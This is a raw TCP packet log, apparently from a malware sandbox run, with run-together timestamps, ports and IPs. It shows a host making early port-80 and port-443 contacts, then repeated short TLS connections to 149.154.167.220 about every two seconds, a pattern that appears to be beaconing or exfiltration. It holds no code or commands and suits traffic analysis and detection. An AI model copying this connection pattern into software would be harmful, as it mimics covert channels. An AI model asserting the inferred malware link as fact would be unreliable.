                                                                                                                                            Dec 16, 2024 14:14:40.893431902 CET4975480192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:40.894073009 CET4975680192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:41.013768911 CET8049754132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:41.013839006 CET4975480192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:41.013842106 CET8049756132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:41.013917923 CET4975680192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:41.014059067 CET4975680192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:41.134212971 CET8049756132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:42.601787090 CET8049756132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:42.603224039 CET49757443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:42.603266001 CET44349757172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:42.603357077 CET49757443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:42.603619099 CET49757443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:42.603636980 CET44349757172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:42.646296024 CET4975680192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:43.821007967 CET44349757172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:43.822802067 CET49757443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:43.822833061 CET44349757172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:44.315924883 CET44349757172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:44.316011906 CET44349757172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:44.316083908 CET49757443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:44.319107056 CET49757443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:44.409270048 CET4975680192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:44.531363010 CET8049756132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:44.531532049 CET4975680192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:44.554157019 CET49758443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:14:44.554210901 CET44349758149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:44.554318905 CET49758443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:14:44.558301926 CET49758443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:14:44.558317900 CET44349758149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:45.925477028 CET44349758149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:45.925540924 CET49758443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:14:45.930321932 CET49758443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:14:45.930330992 CET44349758149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:45.930659056 CET44349758149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:45.932209969 CET49758443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:14:45.975338936 CET44349758149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:46.436727047 CET44349758149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:46.436822891 CET44349758149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:46.436944008 CET49758443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:14:46.443778038 CET49758443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:14:52.862051964 CET4974080192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:52.935800076 CET49759443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:14:52.935856104 CET44349759149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:52.935942888 CET49759443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:14:52.936250925 CET49759443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:14:52.936265945 CET44349759149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:54.299628973 CET44349759149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:54.301846027 CET49759443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:14:54.301868916 CET44349759149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:54.301984072 CET49759443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:14:54.301991940 CET44349759149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:54.887543917 CET44349759149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:54.887630939 CET44349759149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:54.887689114 CET49759443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:14:54.888364077 CET49759443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:16.233973980 CET49792443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:16.234077930 CET44349792149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:16.234199047 CET49792443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:16.243746996 CET49792443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:16.243798018 CET44349792149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:17.609493017 CET44349792149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:17.611515999 CET49792443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:17.611603975 CET44349792149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:17.611720085 CET49792443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:17.611735106 CET44349792149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:18.279676914 CET44349792149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:18.279764891 CET44349792149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:18.279885054 CET49792443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:18.280683994 CET49792443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:18.284614086 CET49797443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:18.284666061 CET44349797149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:18.284778118 CET49797443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:18.285077095 CET49797443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:18.285094976 CET44349797149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:19.648536921 CET44349797149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:19.650633097 CET49797443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:19.650662899 CET44349797149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:19.650733948 CET49797443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:19.650743008 CET44349797149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:20.192603111 CET44349797149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:20.193103075 CET44349797149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:20.193212032 CET49797443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:20.194053888 CET49797443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:20.197911024 CET49803443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:20.198008060 CET44349803149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:20.198128939 CET49803443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:20.198442936 CET49803443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:20.198482990 CET44349803149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:21.569031000 CET44349803149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:21.571454048 CET49803443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:21.571521997 CET44349803149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:21.571587086 CET49803443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:21.571609020 CET44349803149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:22.113352060 CET44349803149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:22.113451004 CET44349803149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:22.113527060 CET49803443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:22.114341021 CET49803443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:22.130187988 CET49809443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:22.130264997 CET44349809149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:22.130335093 CET49809443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:22.131398916 CET49809443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:22.131434917 CET44349809149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:23.507846117 CET44349809149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:23.512674093 CET49809443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:23.512701988 CET44349809149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:23.512763977 CET49809443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:23.512772083 CET44349809149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:24.080872059 CET44349809149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:24.080970049 CET44349809149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:24.081152916 CET49809443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:24.081589937 CET49809443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:24.084557056 CET49815443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:24.084598064 CET44349815149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:24.084683895 CET49815443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:24.084943056 CET49815443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:24.084955931 CET44349815149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:25.459603071 CET44349815149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:25.463048935 CET49815443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:25.463087082 CET44349815149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:25.463192940 CET49815443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:25.463201046 CET44349815149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:26.139800072 CET44349815149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:26.139981031 CET44349815149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:26.140115976 CET49815443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:26.140428066 CET49815443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:26.143026114 CET49821443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:26.143081903 CET44349821149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:26.143285990 CET49821443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:26.143596888 CET49821443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:26.143634081 CET44349821149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:27.514748096 CET44349821149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:27.517211914 CET49821443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:27.517286062 CET44349821149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:27.517388105 CET49821443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:27.517405033 CET44349821149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:28.174241066 CET44349821149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:28.174449921 CET44349821149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:28.174537897 CET49821443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:28.175075054 CET49821443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:28.182846069 CET49824443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:28.182908058 CET44349824149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:28.183052063 CET49824443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:28.183429003 CET49824443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:28.183449030 CET44349824149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:29.555907965 CET44349824149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:29.558180094 CET49824443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:29.558289051 CET44349824149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:29.558360100 CET49824443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:29.558374882 CET44349824149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:30.140887022 CET44349824149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:30.141103983 CET44349824149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:30.141215086 CET49824443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:30.141658068 CET49824443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:30.145405054 CET49829443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:30.145457029 CET44349829149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:30.145653963 CET49829443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:30.145900011 CET49829443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:30.145911932 CET44349829149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:31.511059046 CET44349829149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:31.516468048 CET49829443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:31.516483068 CET44349829149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:31.516563892 CET49829443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:31.516567945 CET44349829149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:32.090271950 CET44349829149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:32.090531111 CET44349829149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:32.090729952 CET49829443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:32.091043949 CET49829443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:32.094126940 CET49835443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:32.094218969 CET44349835149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:32.094310999 CET49835443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:32.094501972 CET49835443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:32.094537973 CET44349835149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:33.462622881 CET44349835149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:33.464248896 CET49835443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:33.464277029 CET44349835149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:33.464376926 CET49835443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:33.464384079 CET44349835149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:34.276016951 CET44349835149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:34.276096106 CET44349835149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:34.276175022 CET49835443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:34.276681900 CET49835443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:34.280544996 CET49841443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:34.280587912 CET44349841149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:34.280668974 CET49841443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:34.280980110 CET49841443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:34.280996084 CET44349841149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:35.647676945 CET44349841149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:35.649986029 CET49841443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:35.650021076 CET44349841149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:35.650094986 CET49841443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:35.650099993 CET44349841149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:36.193346024 CET44349841149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:36.193548918 CET44349841149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:36.194138050 CET49841443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:36.194535017 CET49841443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:36.198847055 CET49847443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:36.198895931 CET44349847149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:36.199057102 CET49847443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:36.199423075 CET49847443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:36.199438095 CET44349847149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:37.570210934 CET44349847149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:37.572494030 CET49847443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:37.572565079 CET44349847149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:37.572664976 CET49847443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:37.572685003 CET44349847149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:38.130121946 CET44349847149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:38.130203009 CET44349847149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:38.130383015 CET49847443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:38.130973101 CET49847443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:38.134993076 CET49853443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:38.135035038 CET44349853149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:38.135200977 CET49853443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:38.135726929 CET49853443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:38.135749102 CET44349853149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:39.497097969 CET44349853149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:39.502784967 CET49853443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:39.502824068 CET44349853149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:39.503020048 CET49853443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:39.503029108 CET44349853149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:40.049539089 CET44349853149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:40.049743891 CET44349853149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:40.049839973 CET49853443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:40.050339937 CET49853443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:40.054164886 CET49859443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:40.054215908 CET44349859149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:40.054279089 CET49859443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:40.054579020 CET49859443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:40.054590940 CET44349859149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:41.430926085 CET44349859149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:41.433577061 CET49859443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:41.433593035 CET44349859149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:41.435811043 CET49859443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:41.435816050 CET44349859149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:41.992816925 CET44349859149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:41.993016958 CET44349859149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:41.993083954 CET49859443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:41.993701935 CET49859443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:41.998600006 CET49864443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:41.998709917 CET44349864149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:41.998884916 CET49864443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:41.999373913 CET49864443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:41.999423027 CET44349864149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:43.397728920 CET44349864149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:43.408082008 CET49864443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:43.408169985 CET44349864149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:43.408262968 CET49864443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:43.408284903 CET44349864149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:44.303402901 CET44349864149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:44.305587053 CET44349864149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:44.305733919 CET49864443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:44.306220055 CET49864443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:44.309583902 CET49871443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:44.309628963 CET44349871149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:44.309748888 CET49871443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:44.310081959 CET49871443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:44.310097933 CET44349871149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:45.677608013 CET44349871149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:45.680490971 CET49871443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:45.680526018 CET44349871149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:45.680592060 CET49871443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:45.680600882 CET44349871149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:46.307384014 CET44349871149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:46.307492018 CET44349871149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:46.307697058 CET49871443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:46.307974100 CET49871443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:46.311382055 CET49876443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:46.311414003 CET44349876149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:46.311476946 CET49876443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:46.311744928 CET49876443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:46.311758041 CET44349876149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:47.675693989 CET44349876149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:47.682549000 CET49876443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:47.682576895 CET44349876149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:47.682642937 CET49876443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:47.682651997 CET44349876149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:48.329469919 CET44349876149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:48.331569910 CET44349876149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:48.331624985 CET49876443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:48.332014084 CET49876443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:48.335773945 CET49882443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:48.335822105 CET44349882149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:48.336544037 CET49882443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:48.336772919 CET49882443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:48.336791039 CET44349882149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:49.701570034 CET44349882149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:49.703229904 CET49882443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:49.703254938 CET44349882149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:49.703352928 CET49882443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:49.703363895 CET44349882149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:50.369771957 CET44349882149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:50.370605946 CET44349882149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:50.370676994 CET49882443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:50.371296883 CET49882443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:50.374751091 CET49888443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:50.374799013 CET44349888149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:50.374900103 CET49888443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:50.375176907 CET49888443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:50.375186920 CET44349888149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:51.771719933 CET44349888149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:51.773523092 CET49888443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:51.773552895 CET44349888149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:51.773616076 CET49888443192.168.2.4149.154.167.220
                                                                                                                                            Dec 16, 2024 14:15:51.773627043 CET44349888149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:52.391688108 CET44349888149.154.167.220192.168.2.4
                                                                                                                                            Dec 16, 2024 14:15:52.391783953 CET44349888149.154.167.220192.168.2.4
